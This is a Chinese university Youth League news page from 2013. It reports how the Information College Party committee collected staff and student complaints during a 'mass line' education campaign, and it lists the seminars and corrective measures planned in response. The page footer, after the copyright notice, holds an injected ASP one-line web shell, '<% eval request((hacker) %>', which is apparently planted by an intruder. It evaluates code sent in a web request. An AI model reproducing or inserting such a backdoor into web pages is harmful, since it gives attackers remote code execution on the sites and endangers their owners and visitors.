当前位置:共青团上海海洋大学委员会 >> 理论学习 >> 时政热点 >> 正文  
站内信息搜索:
教育实践活动系列报道之七:信息学院紧扣教育主题聚焦突出问题
[2013年10月30日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

     如何深入推进学科和师资队伍建设,推进学院内涵发展?如何坚持以人为本,深化教育教学改革?要实现“一切为了师生的终身发展”的办学理念、提高教育教学质量着力点在哪里?信息学院党委自教育实践活动开展以来,开门见山、直奔主题,坚持“师生想什么,我们就干什么,发现什么问题就整改什么问题”的工作思路,认真组织开展学习教育,以不同方式听取和收集意见建议,并进行梳理、分类、归纳。活动中,既当好组织者、推进者、监督者,又真正把自己摆进去,当好参与者。

    “知屋漏者在宇下,知政失者在草野。”在党的群众路线教育实践活动中,信息学院党委通过座谈交流、个别访谈、征求意见等方式全方位了解师生密切关注的教学改革、学生管理、青年教师发展等亟待解决的民生问题。“学院的教学教务工作中,需各职能部门交很多的材料、白皮书等,耗费学院很多精力,不知到底起什么作用、解决了什么问题。”“能否调动基层教师的积极性参与学院管理。”“面对房子、工作上带来的压力,如何减轻新教师的压力?”“很多教师有各类申报的科研项目和基金,是否能两年考核一次以有利于科研工作的展开?”“如何协调好专业教师和基础教师、老教师和新教师、科研型和教学型老师的考核工作量?”……一条条让人脸红出汗的意见建议,原汁原味的摆放在了学院领导的案头。

    群众利益无小事。面对师生提出的一系列问题,学院领导班子在活动中不回避、不掩饰,把群众意见当作“出出汗、排排毒”的治病良药,以群众意见作为落实整改的努力方向,立说立行,即知即改。学院领导认真撰写对照检查材料,既联系工作实际,又触及思想灵魂,讲真话、讲实话、讲心里话;正面回应干部群众所提意见,提出实实在在、明确具体、便于实施的整改措施。目前,学院党委已提交问题梳理材料、班子对照检查分析材料、班子民主生活会方案等材料。同时,经过多次讨论、修改,凝聚了师生对教育实践活动的殷切期盼的13条整改意见也逐渐清晰。

    结合学院实际,学院党委坚持把解决问题与推进发展、破解难题、改善民生、提振精气神相结合,提出通过系列专题研讨会解决群众路线教育中查摆出的问题,“10月份和11月份部署教学和学科研讨会,10月份重点完成教学研讨,11月份重点完成研究生工作和学科研讨”……通过第一阶段的学习、调研,信息学院党委不仅真正掌握了师生的真实意愿,而且密切了党群干群关系,使党员领导干部接了地气,变了作风,而且为下一步开展党的群众路线教育活动提供了一手资料。

 

关闭窗口

上一篇:“来自基层的声音”之三:做生涯发展教育的践行者

下一篇:以实践活动为抓手,积极推进公共数据库服务平台建设
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>